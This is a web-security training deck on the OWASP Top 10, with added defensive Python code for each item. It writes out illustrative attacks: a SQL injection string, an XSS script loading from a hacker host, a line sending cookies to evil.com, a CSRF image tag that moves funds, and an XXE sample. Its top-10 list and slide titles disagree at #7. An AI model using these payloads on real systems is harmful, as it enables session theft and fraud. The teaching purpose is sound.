Web Security & OWASP
By Isuru Samaraweera
Agenda
• What is web security and why?
• Introduction to OWASP
• OWASP top 10
• OWASP Security testing tools
• General Security testing tools
• Q & A
What is web security and why?
• Security of websites, web applications and web services.
• Emergence of Web 2.0
• Intruders exploit vulnerabilities
• Techniques: XSS, SQL injection, etc.
• Attacker profiles
• Catastrophic security hacks
• Sony Entertainment 2011 - 77 million accounts with credit card numbers
• JP Morgan Chase 2014 - 7.6 million account information
• MasterCard 2005 - 40 million accounts
• Business risk
• Trust issues
• Overhead costs
• Security checkpoints and techniques
• Early stages of development
OWASP (https://www.owasp.org)
• The Open Web Application Security Project (OWASP)
• Non-profit organization, open community
• Vulnerabilities, threats, attacks and countermeasures
• Development guide
• https://www.owasp.org/index.php/Projects/OWASP_Development_Guide
• Testing guide
• https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
• Code review guide
• https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
• Webgoat sample web application
• https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
• Mailing lists
• https://lists.owasp.org/mailman/listinfo
• Newsletter
• https://www.owasp.org/index.php/Category:OWASP_Newsletter
• Many more…
OWASP top 10 (2017)
• Injection
• Broken Authentication and Session Management
• Cross Site Scripting (XSS)
• Broken Access Control
• Security Misconfiguration
• Sensitive Data Exposure
• Missing Function Level Access Control
• Cross Site Request Forgery (CSRF)
• Using Components with Known Vulnerabilities
• Underprotected APIs
(#1) - Injection
• Send untrusted data into the system
• Text-based attacks
• External and internal parties
• SQL, LDAP, JPQL, XPath, NoSQL
• String query = "SELECT * FROM user_data WHERE lastName='" + request.getParameter("lastName") + "'";
• Query HQLQuery = session.createQuery("FROM user_data WHERE lastName ='" + request.getParameter("lastName") + "'");
• http://example.com/app/userView?lastName=' or '1'='1
Preventing Injection
• Avoid dynamic queries
• Parameterized queries
• PreparedStatement, SqlCommand, PDO
• Stored procedures
• Input validation
• Carefully escape special characters if no API is available
• OWASP Enterprise Security API
• ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam );
• Use code analysis tools
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
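The string-concatenated query on the previous slide and the parameterized query recommended here, side by side. This is an added Python example, not code from the presentation; the in-memory SQLite table and its rows are constructed stand-ins for the user_data table, and the payload is the lastName value from the example URL above.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the page's user_data table (assumption).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (id INTEGER, lastName TEXT, ssn TEXT)")
    conn.executemany(
        "INSERT INTO user_data VALUES (?, ?, ?)",
        [(1, "Smith", "111-11-1111"), (2, "Jones", "222-22-2222"), (3, "Adams", "333-33-3333")],
    )
    return conn


def user_view_vulnerable(conn: sqlite3.Connection, last_name: str) -> list:
    # Mirrors the slide's dynamic query: the request parameter is pasted into the SQL text,
    # so a quote in the value ends the string literal and the rest is parsed as SQL.
    query = "SELECT id, lastName FROM user_data WHERE lastName='" + last_name + "'"
    return conn.execute(query).fetchall()


def user_view_parameterized(conn: sqlite3.Connection, last_name: str) -> list:
    # Parameterized form: the driver binds the value; it is never parsed as SQL,
    # so the same payload is simply compared against the column and matches nothing.
    query = "SELECT id, lastName FROM user_data WHERE lastName=?"
    return conn.execute(query, (last_name,)).fetchall()


# The lastName value from the slide's example URL.
PAYLOAD = "' or '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print(user_view_vulnerable(conn, "Smith"))       # one row
    print(user_view_vulnerable(conn, PAYLOAD))       # every row: WHERE clause is always true
    print(user_view_parameterized(conn, PAYLOAD))    # no rows
```

The vulnerable function returns the whole table for the payload because the resulting statement reads `WHERE lastName='' or '1'='1'`; the parameterized one returns nothing because no last name equals the literal string.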
(#2) - Broken Authentication and Session Management
• Custom authentication and session management with flaws
• Credentials not protected with hashing
• Insider attacks
• Credentials can be guessed
• Session ID exposed in the URL -> session fixation
• Session ID won't time out
• Session IDs are not rotated on successful logins
• http://website.com/login.php?;jsessionid=2P0OC2JSNDLPSKHCJUN2JV&d
Protecting the Password
• Hashing
• Transport
• Storage
Crack Password Hash
• Dictionary attack
• File containing words, phrases, common passwords
• Brute-force attack
• Tries every possible combination of characters up to a given length.
• Look up table
• Dictionary in a lookup table data structure
• Rainbow table
• High performance lookup
User Registration with Salt
• App posts the username foo@example.com with password pass
• Server generates a random salt r
• Server computes h = H(r|pass)
• Server stores (foo@example.com, h, r) in the DB
Simplified login flow
• App posts username foo@example.com and password pass
• Server looks up the salt r using the user ID
• Server computes the hash h' = H(r|pass)
• If (foo@example.com, h') exists in the DB, allow login
Attack on password database
Hashing with key and random salt
• Is it safe?
Hashing recipe
• Bind password hash value to account
• Use application secret
• Follow password hashing best practices
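The registration and login flows above, with the three points of the hashing recipe applied: the hash is bound to the account name, keyed with an application secret that is kept out of the database, and H is a slow salted hash instead of a bare digest. This is an added Python example, not the presenter's code; the secret value, the iteration count and the dict standing in for the DB table are constructed assumptions.

```python
import hashlib
import hmac
import os

# Constructed application secret. In a deployment it lives outside the database
# (environment, secrets manager or HSM), so a copy of the user table alone is useless.
APP_SECRET = b"constructed-application-secret-do-not-reuse"
PBKDF2_ROUNDS = 100_000   # illustrative; take the current value from the Password Storage Cheat Sheet


def H(r: bytes, password: str) -> bytes:
    # h = H(r|pass) from the slides, with PBKDF2-HMAC-SHA256 as the slow, salted H.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), r, PBKDF2_ROUNDS)


def keyed(username: str, h: bytes, secret: bytes = APP_SECRET) -> bytes:
    # "Bind the hash to the account" and "use an application secret":
    # HMAC over (username, h) under the secret. Without the secret nobody can
    # recompute or verify this value, even with the salt and the hash in hand.
    return hmac.new(secret, username.encode() + b"\x00" + h, "sha256").digest()


def register(db: dict, username: str, password: str) -> None:
    r = os.urandom(16)                                   # random per-user salt
    db[username] = (keyed(username, H(r, password)), r)  # store (user, hash, r)


def login(db: dict, username: str, password: str, secret: bytes = APP_SECRET) -> bool:
    record = db.get(username)
    if record is None:
        H(b"\x00" * 16, password)   # same cost for unknown users: no timing oracle on usernames
        return False
    stored, r = record
    h2 = keyed(username, H(r, password), secret)
    return hmac.compare_digest(stored, h2)   # constant-time comparison


if __name__ == "__main__":
    db = {}
    register(db, "foo@example.com", "pass")
    print(login(db, "foo@example.com", "pass"))    # True
    print(login(db, "foo@example.com", "wrong"))   # False
```

The answer to "is it safe?" on the previous slide depends on where the key lives: with the secret stored next to the table, the scheme degrades to plain salted hashing, which the dictionary and brute-force attacks listed earlier still apply to, only more slowly.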
Transport Security of a password
Hashing the password on client
Encrypt the password
• Asymmetric encryption
• Problems?
Preventing broken authentication contd...
• Implement proper password strength controls
• Password length > 10 and < 128
• Password complexity
• at least 1 uppercase character (A-Z)
• at least 1 lowercase character (a-z)
• at least 1 digit (0-9)
• at least 1 special character (punctuation); do not forget to treat space as a special character too
• Not more than 2 identical characters in a row (e.g., 111 not allowed)
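The strength rules listed above as one server-side check. This is an added Python example, not from the slides; the length bounds are read as strictly greater than 10 and strictly less than 128, and "special" is taken to mean any character that is not a letter or digit, which includes space.

```python
import re

MIN_LEN, MAX_LEN = 10, 128   # the slide's bounds, applied as MIN_LEN < length < MAX_LEN


def password_findings(pw: str) -> list:
    """Return the rules the password violates; an empty list means it is accepted."""
    findings = []
    if not (MIN_LEN < len(pw) < MAX_LEN):
        findings.append("length must be greater than 10 and less than 128")
    if not re.search(r"[A-Z]", pw):
        findings.append("needs an uppercase character")
    if not re.search(r"[a-z]", pw):
        findings.append("needs a lowercase character")
    if not re.search(r"[0-9]", pw):
        findings.append("needs a digit")
    # Anything that is not an ASCII letter or digit counts as special; space included.
    if not re.search(r"[^A-Za-z0-9]", pw):
        findings.append("needs a special character (space counts)")
    # Three identical characters in a row, e.g. 111, is more than 2.
    if re.search(r"(.)\1\1", pw, re.DOTALL):
        findings.append("more than 2 identical characters in a row")
    return findings


def is_acceptable(pw: str) -> bool:
    return not password_findings(pw)


if __name__ == "__main__":
    for candidate in ("Correct Horse 9!", "Passw0rd!!!", "short1A!"):
        print(repr(candidate), password_findings(candidate))
```

Returning the list of violated rules rather than a bare boolean lets the registration form tell the user what to fix, while the login path (previous slides) still answers with one generic message.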
Preventing broken authentication contd..
• Authentication and error messages
• Respond with a generic error message
• Incorrect response examples
• "Login for User foo: invalid password"
• "Login failed, invalid user ID"
• "Login failed; account disabled"
• "Login failed; this user is not active"
• Correct response example
• "Login failed; Invalid userID or password"
Preventing broken authentication contd..
• Prevent brute-force attacks
• Account lockout
• Multi-factor authentication
• Logging and monitoring
• Use of authentication protocols that require no password
• OAuth
• OpenID
• SAML
• Leverage available frameworks and tools
• Apache Shiro
• Spring Security
• OWASP ESAPI
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
Preventing Session Management issues
• Secure login over HTTPS
• Password submitted encrypted
• Immediate redirect to HTTP
• Session ID sent in clear text <- vulnerability
Preventing Session Management issues contd..
• User requests an HTTP page; the response redirects to HTTPS
• The 302 response travels over HTTP: vulnerability point
Preventing Session Management issues contd..
• HSTS - HTTP Strict Transport Security
• Opt-in security control
• Instructs the browser to upgrade every connection to the site to HTTPS (Strict Transport Security)
• HSTS forces
• All communications over HTTPS
• No insecure HTTP requests sent from the browser
• No option for the user to override untrusted certificates
Enabling HSTS
• In Apache add the lines below to .htaccess
• # Use HTTP Strict Transport Security to force client to use secure connections only
Header always set Strict-Transport-Security "max-age=300; includeSubDomains"
max-age => The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS.
includeSubDomains => If this optional parameter is specified, this rule applies to all of the site's subdomains as well.
• Can be done in Nginx, IIS etc.
Preventing Session Management issues contd..
• HTTP Strict Transport Security (HSTS)
• Cookies
• Secure
• <secure>true</secure>
• HttpOnly
• <http-only>true</http-only>
• Cache-Control: no-cache, no-store
• Pragma: no-cache
• New session IDs on consecutive logins
• https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
• https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_authentication
• https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet
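The response headers the last three slides ask for (HSTS, Secure and HttpOnly on the session cookie, no caching), built once and audited by a second function that reports which control a captured response is missing. This is an added Python example, not from the slides; the cookie name JSESSIONID and the default max-age of 300 follow the deck's own examples (300 seconds is a test value; a deployed policy is normally far longer), and the header list format is an assumption.

```python
from http.cookies import SimpleCookie


def secure_response_headers(session_id: str, max_age: int = 300) -> list:
    """Headers for an authenticated HTTPS response, as (name, value) pairs."""
    cookie = SimpleCookie()
    cookie["JSESSIONID"] = session_id
    cookie["JSESSIONID"]["secure"] = True      # never sent over plain HTTP
    cookie["JSESSIONID"]["httponly"] = True    # not readable via document.cookie
    cookie["JSESSIONID"]["path"] = "/"
    return [
        ("Strict-Transport-Security", f"max-age={max_age}; includeSubDomains"),
        ("Set-Cookie", cookie["JSESSIONID"].OutputString()),
        ("Cache-Control", "no-cache, no-store"),
        ("Pragma", "no-cache"),
    ]


def audit_headers(headers: list) -> list:
    """Findings for a response that lacks the controls above (empty list = all present)."""
    findings = []
    lowered = [(name.lower(), value) for name, value in headers]
    hsts = [value for name, value in lowered if name == "strict-transport-security"]
    if not hsts:
        findings.append("missing Strict-Transport-Security")
    elif "includesubdomains" not in hsts[0].lower():
        findings.append("HSTS does not cover subdomains")
    for name, value in lowered:
        if name != "set-cookie":
            continue
        attrs = [part.strip().lower() for part in value.split(";")]
        cookie_name = attrs[0].split("=", 1)[0]
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name} lacks Secure")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} lacks HttpOnly")
    cache = [value for name, value in lowered if name == "cache-control"]
    if not cache or "no-store" not in cache[0].lower():
        findings.append("Cache-Control should include no-store")
    return findings


if __name__ == "__main__":
    good = secure_response_headers("2P0OC2JSNDLPSKHCJUN2JV")
    print(audit_headers(good))                                            # []
    print(audit_headers([("Set-Cookie", "JSESSIONID=abc; Path=/")]))      # several findings
```

The audit function is the useful half for operations: run it over the headers of your own login response (captured with the browser tools or a proxy such as OWASP ZAP) and it names exactly which slide's control is missing.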
(#3) - Cross Site Scripting (XSS)
• Text-based attack scripts that exploit the interpreter in the browser.
• The attacker adds the following comment:
• Great price for a great item! Read my review here <script src="http://hackersite.com/authstealer.js"> </script>.
• document.location=http://evil.com?id=document.cookie
Inject malicious HTML
Preventing XSS
• HTML escape before inserting untrusted data
• String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
• & --> &amp;
• < --> &lt;
• > --> &gt;
• JavaScript escape before inserting untrusted data
• <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
• String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
• CSS escape before inserting untrusted data
• <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>
• String safe = ESAPI.encoder().encodeForCss( request.getParameter( "input" ) );
Preventing XSS contd...
• URL escape before inserting untrusted data
• <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a>
• String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );
• XSS filters: block requests with dangerous tags and scripts
• OWASP AntiSamy project
• HTML and CSS encoding.
• https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
• HTML sanitizer project
• https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
• https://github.com/mganss/HtmlSanitizer
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
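The four context-specific encoders from the two slides above (HTML, JavaScript string, CSS value, URL parameter), applied to the review comment from the XSS slide. This is an added Python example, not the presentation's ESAPI code; the encoding rules follow the OWASP XSS Prevention Cheat Sheet (entities for HTML, \xHH for JavaScript, \HH followed by a space for CSS, percent-encoding for URLs) and the render_review template is a constructed stand-in for the page that shows the comment.

```python
import html
from urllib.parse import quote


def encode_for_html(s: str) -> str:
    # & < > " ' become entities, so the data can never close or open a tag or attribute.
    return html.escape(s, quote=True)


def encode_for_javascript(s: str) -> str:
    # Inside a JS string literal every non-alphanumeric character becomes \xHH (or \uHHHH
    # above 0xFF), so no quote, backslash, newline or </script> sequence survives.
    out = []
    for ch in s:
        cp = ord(ch)
        if ch.isalnum() and cp < 128:
            out.append(ch)
        elif cp < 256:
            out.append(f"\\x{cp:02X}")
        else:
            out.append(f"\\u{cp:04X}")
    return "".join(out)


def encode_for_css(s: str) -> str:
    # Inside a CSS property value: \HH with a trailing space, which terminates the escape.
    return "".join(ch if (ch.isalnum() and ord(ch) < 128) else f"\\{ord(ch):X} " for ch in s)


def encode_for_url(s: str) -> str:
    # For a single query-string value: percent-encode everything except unreserved characters.
    return quote(s, safe="")


# The comment from the XSS slide, used here as the untrusted input.
COMMENT = ('Great price for a great item! Read my review here '
           '<script src="http://hackersite.com/authstealer.js"> </script>.')


def render_review(comment: str) -> str:
    # Each context gets its own encoder; HTML encoding alone does not protect the others.
    return (
        f"<p>{encode_for_html(comment)}</p>\n"
        f"<script>var review = '{encode_for_javascript(comment)}';</script>\n"
        f'<a href="/search?q={encode_for_url(comment)}">link</a>'
    )


if __name__ == "__main__":
    print(render_review(COMMENT))
```

Note that the JavaScript and CSS encoders are deliberately more aggressive than the HTML one: an allow-list of ASCII letters and digits is easier to get right than a deny-list of dangerous characters, which is the same choice ESAPI makes.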
(#4) - Broken Access Control
• Unprivileged function access
• http://example.com/app/getappInfo
• http://example.com/app/admin_getappInfo
• Unauthorized data access
• http://soomebank.com/showacct?id=101
• http://soomebank.com/showacct?id=102
• Prevention
• Access control matrix
• Check access
• Do not assume that users will be unaware of special or hidden URLs or APIs.
• Penetration tests
• Regular audits, code reviews, automated verification
• Principle of least privilege
• Principle of defense in depth
• https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference
• https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
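Both failures on this slide, function-level (admin_getappInfo reachable by anyone who guesses the URL) and object-level (showacct?id=102 returned to the owner of 101), handled by an access-control matrix plus an ownership check. This is an added Python example, not from the slides; the roles, the matrix and the account-to-owner table are constructed assumptions.

```python
# Constructed access-control matrix: role -> functions that role may call (assumption).
ACL = {
    "user":  {"getappInfo", "showacct"},
    "admin": {"getappInfo", "admin_getappInfo", "showacct"},
}

# Constructed data: account id -> owning user (assumption).
ACCOUNTS = {101: "alice", 102: "bob"}


class Forbidden(Exception):
    """Raised when a request fails an access check; the caller maps it to 403."""


def check_function_access(role: str, function: str) -> None:
    # Function-level check. The URL being unlinked or "hidden" is not a control;
    # the matrix is consulted on every call, whatever the user typed.
    if function not in ACL.get(role, set()):
        raise Forbidden(f"role {role} may not call {function}")


def can_call(role: str, function: str) -> bool:
    try:
        check_function_access(role, function)
        return True
    except Forbidden:
        return False


def show_account(user: str, role: str, account_id: int) -> dict:
    check_function_access(role, "showacct")
    owner = ACCOUNTS.get(account_id)
    if owner is None:
        raise KeyError(account_id)
    # Object-level check: the id in the query string is untrusted input, not an authorization.
    # A plain user only ever reads their own account; an admin's access comes from the role.
    if role != "admin" and owner != user:
        raise Forbidden(f"{user} may not read account {account_id}")
    return {"id": account_id, "owner": owner}


def can_show(user: str, role: str, account_id: int) -> bool:
    try:
        show_account(user, role, account_id)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    print(can_show("alice", "user", 101))            # True: own account
    print(can_show("alice", "user", 102))            # False: id changed in the URL
    print(can_call("user", "admin_getappInfo"))      # False: not in the matrix
```

Keeping the ownership rule inside show_account (rather than in the URL handler) is the defense-in-depth point: every path that reaches the data goes through the same check, including any API added later.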
(#5) - Security Misconfiguration
• Can happen at any level
• Web server
• App server
• Database
• Custom code
• Out-of-date software
• Unnecessary ports and services
• Do error messages expose stack traces?
• Are framework settings set to secure values? (Struts, Spring, .NET etc.)
• Prevention
• Frequent audits
• Deployment process
• Automate configuration validation
• https://www.owasp.org/index.php/Configuration
• https://www.owasp.org/index.php/Error_Handling
• https://www.owasp.org/index.php/Testing_for_configuration_management
• https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)
• https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management
(#6) - Sensitive Data Exposure
• Passwords, credit card numbers etc. (in transit or at rest)
• Not encrypting sensitive data
• Using weak keys and algorithms to encrypt
• SSL not enabled along the entire path
• Prevention measures
• Encrypt sensitive data correctly
• AES-256
• Key-encrypting key
• Hardware security modules
• RSA 2048
• Don't store sensitive data unnecessarily
• Disable caching and auto-completion
• https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_SSL-TLS
(#7) - Insufficient Attack Protection
• Inability to detect, prevent, and respond to both manual and automated attacks
• Automated attacks with tools such as OWASP ZAP or sqlmap (http://sqlmap.org/)
• Manual human attack
• Detect attacks -> OWASP AppSensor
• An input a legitimate client can't generate?
• Unusual usage patterns, repeated requests, spikes?
• Respond to attacks -> OWASP AppSensor
• Decide whether to automatically block requests, IP addresses, or IP ranges.
• Consider disabling or monitoring misbehaving user accounts.
• Patch quickly
Monitor security
• Monitor log files
• Monitor network bandwidth
• https://www.owasp.org/index.php/OWASP_AppSensor_Project
• https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications
• https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet
• https://www.owasp.org/index.php/Virtual_Patching_Cheat_Sheet
• https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
• https://www.owasp.org/index.php/Intrusion_Detection
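The two AppSensor-style detection questions from the slide ("an input a legitimate client can't generate?" and "repeated requests?") as rules run over access-log lines. This is an added Python example, not part of the presentation or the AppSensor project; the log format, the thresholds, the list of parameters each page's form actually submits and the lastName pattern are all constructed assumptions, and the log lines themselves are constructed, using the userView URL from the injection slide.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl

# Constructed access log (assumption): "<ISO time> <client ip> <method> <path> <status>".
LOG = """\
2017-05-01T10:00:01 203.0.113.7 POST /login 401
2017-05-01T10:00:02 203.0.113.7 POST /login 401
2017-05-01T10:00:03 203.0.113.7 POST /login 401
2017-05-01T10:00:04 203.0.113.7 POST /login 401
2017-05-01T10:00:05 203.0.113.7 POST /login 401
2017-05-01T10:00:06 203.0.113.7 POST /login 401
2017-05-01T10:00:30 198.51.100.4 GET /app/userView?lastName=Smith 200
2017-05-01T10:00:31 198.51.100.4 GET /app/userView?lastName='%20or%20'1'='1 200
2017-05-01T10:01:00 192.0.2.9 GET /app/profile?id=42&role=admin 200
"""

FAILED_LOGIN_LIMIT = 5      # more than this many 401s from one IP inside the window is a finding
WINDOW_SECONDS = 60
# Parameters the real forms submit (assumption); anything else was hand-crafted by the client.
EXPECTED_PARAMS = {"/app/userView": {"lastName"}, "/app/profile": {"id"}}
# What the browser-side validation of the lastName field allows (assumption).
FIELD_PATTERNS = {"lastName": re.compile(r"[A-Za-z' -]{1,40}")}
LINE = re.compile(r"(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_log(log: str):
    for line in log.splitlines():
        ts, ip, method, url, status = LINE.match(line).groups()
        yield datetime.fromisoformat(ts), ip, method, url, int(status)


def detect(log: str) -> list:
    findings = []
    recent_failures = defaultdict(list)   # ip -> timestamps of 401s still inside the window
    for ts, ip, method, url, status in parse_log(log):
        path, _, query = url.partition("?")
        # "Repeated requests": authentication failures clustered in time from one source.
        if path == "/login" and status == 401:
            window = [t for t in recent_failures[ip] if (ts - t).total_seconds() <= WINDOW_SECONDS]
            window.append(ts)
            recent_failures[ip] = window
            if len(window) > FAILED_LOGIN_LIMIT:
                findings.append(f"{ip}: {len(window)} failed logins within {WINDOW_SECONDS}s")
        # "Input a legitimate client can't generate": parameters the form never sends, or a
        # value the form's own validation would have refused before submitting.
        if path in EXPECTED_PARAMS:
            params = parse_qsl(query, keep_blank_values=True)
            for name in sorted({k for k, _ in params} - EXPECTED_PARAMS[path]):
                findings.append(f"{ip}: unexpected parameter '{name}' on {path}")
            for name, value in params:
                pattern = FIELD_PATTERNS.get(name)
                if pattern and not pattern.fullmatch(value):
                    findings.append(f"{ip}: value of {name} on {path} could not come from the form")
    return findings


if __name__ == "__main__":
    for finding in detect(LOG):
        print(finding)
```

Each finding carries the client IP, which is what the response step on the slide needs (block the address or range, or flag the account); the thresholds are deliberately small so the constructed log trips them.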
(#8) - Cross Site Request Forgery
• Attacker tricks the victim with URLs
• Execute unwanted actions
• Compromise the entire application
• http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
• Attacker emails the victim HTML containing the URL below
• <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
Preventing CSRF
• Include a unique token in a hidden field
• Verify the token on each request
• CSRFGuard
• Re-authenticate
• https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
• http://lists.owasp.org/pipermail/owasp-csrfguard
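The hidden-field token pattern from the slide: one random token per session, emitted in the form and checked on every state-changing request. The forged request from the previous slide fails because the browser attaches the victim's cookies but cannot read or send the token. This is an added Python example, not CSRFGuard or any other project's code; the session dict, the form dict and the transferFunds handler are constructed stand-ins.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    # One unpredictable token per session, stored server-side in the session.
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def hidden_field(session: dict) -> str:
    # Rendered into every form that performs an action; token_urlsafe is attribute-safe.
    return f'<input type="hidden" name="csrf_token" value="{issue_csrf_token(session)}">'


def transfer_funds(session: dict, form: dict) -> str:
    # Verify before doing anything else. A request that arrives with cookies but without
    # the matching token (the <img> from the slide, a link in an e-mail) is refused.
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"transferred {form['amount']} to {form['destinationAccount']}"


if __name__ == "__main__":
    session = {}
    print(hidden_field(session))
    legit = {"amount": "1500", "destinationAccount": "4673243243",
             "csrf_token": session["csrf_token"]}
    forged = {"amount": "1500", "destinationAccount": "attackersAcct"}   # what the <img> sends
    print(transfer_funds(session, legit))
    print(transfer_funds(session, forged))
```

Two details matter in practice: the comparison is constant-time so the token cannot be guessed byte by byte, and the check is tied to the session, so a token captured from one user is useless for another. Accepting the transfer only on POST (never on a GET like the slide's URL) is the complementary control.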
(#9) - Using components with known vulnerabilities
• Outdated libraries
• Apache CXF Authentication Bypass (2012)
• Call with no identity token => invoke any web service with full permission
• Spring Remote Code Execution (2011/2012)
• Expression Language flaw => execute arbitrary code on the server
• Struts2 Remote Code Execution (2017)
• Mishandles file upload
• Content-Type header flaw => execution of arbitrary code on the server
Preventing use of components with known vulnerabilities
• Identify all components and dependent libraries
• OWASP Dependency-Check
• https://www.owasp.org/index.php/OWASP_Dependency_Check
• Retire.js
• https://github.com/retirejs/retire.js/
• Monitor the security of these components
• Mailing lists
• Official sites
• Security policy on 3rd-party libraries
• Software development practices to use
• Passing security tests
• Acceptable licenses
• Wrappers to expose only the required functions of an API
• https://cve.mitre.org/about/
• https://www.owasp.org/index.php/Virtual_Patching_Best_Practices
(#10) - Underprotected APIs
• REST, JSON, and XML APIs
• Mobile app connecting to a remote API (username, password and account number)
• Public SMS JSON API -> SQL injection
• XML: XXE
• External entity is processed by the XML parser
• Prevention
• Secure communications between the client and your APIs.
• Strong authentication scheme for your APIs.
• Parser configuration hardened against attack.
• Protect against injection of all forms.
• https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
• https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet
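"Parser configuration hardened against attack" for the XXE item above: an XML parser for untrusted API input that refuses any DOCTYPE, entity declaration or external entity reference before the parser can act on it, so an external entity is never processed. This is an added Python example, not from the slides; it uses the standard-library expat bindings directly, expects a flat record document of the constructed shape below, and the sample documents (including the placeholder file reference) are constructed.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE, an entity declaration or an external reference."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse <record><field>value</field>...</record> into a dict, refusing DTD constructs."""
    parser = xml.parsers.expat.ParserCreate()
    result, stack, text = {}, [], []

    # Expat reports these before it resolves anything; raising here aborts the parse,
    # so no file is read and no URL is fetched on behalf of the document.
    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} not accepted from untrusted input")

    def forbid_entity(*decl):
        raise DTDForbidden("entity declarations not accepted from untrusted input")

    def forbid_external(context, base, sysid, pubid):
        raise DTDForbidden(f"external entity reference to {sysid!r} refused")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def end(name):
        if len(stack) == 2:              # a field directly under the root element
            result[name] = "".join(text)
        stack.pop()
        text.clear()

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return result


def is_accepted(data: bytes) -> bool:
    try:
        parse_untrusted_xml(data)
        return True
    except DTDForbidden:
        return False


# Constructed sample documents. The second one declares an external entity pointing at a
# placeholder path; a permissive parser would substitute that file's contents for &xxe;.
GOOD = b"<record><account>101</account><phone>555-0100</phone></record>"
XXE = (b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///CONSTRUCTED/placeholder.txt">]>'
       b"<record><account>&xxe;</account></record>")

if __name__ == "__main__":
    print(parse_untrusted_xml(GOOD))   # {'account': '101', 'phone': '555-0100'}
    print(is_accepted(XXE))            # False
```

Rejecting the DOCTYPE outright is the simplest hardening and also stops internal-entity expansion attacks; an API that genuinely needs a DTD should validate against a DTD it ships itself rather than one supplied in the request.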
OWASP Testing tools
• The OWASP Application Security Verification Standard (ASVS) Project
• Tests web application technical security controls
• Requirements for secure development.
• Procurement
• https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project
• OWASP Live CD project
• Best open source security tools in a single bootable environment
• Boot from this Live CD or run it as a VM
• Access to a full security testing suite
• No configuration required
• OWASP ZAP
• https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
General Security Testing tools
• IronWASP (https://ironwasp.org/)
• Over 25 kinds of web vulnerabilities
• Wireshark (https://www.wireshark.org/)
• Network packet analyzer.
• Google nogotofail (https://github.com/google/nogotofail)
• Known TLS/SSL vulnerabilities and misconfigurations.
• sqlmap (http://sqlmap.org/)
• SQL injection
• Qualys (https://www.qualys.com)
Security code review
• Fastest and most accurate
• Data Validation
• Authentication
• Session management
• Authorization
• Cryptography
• Error handling
• Logging
• Security Configuration
• Network Architecture
• Tools
• Code crawler
• Orizon
• O2
• FindSecurityBugs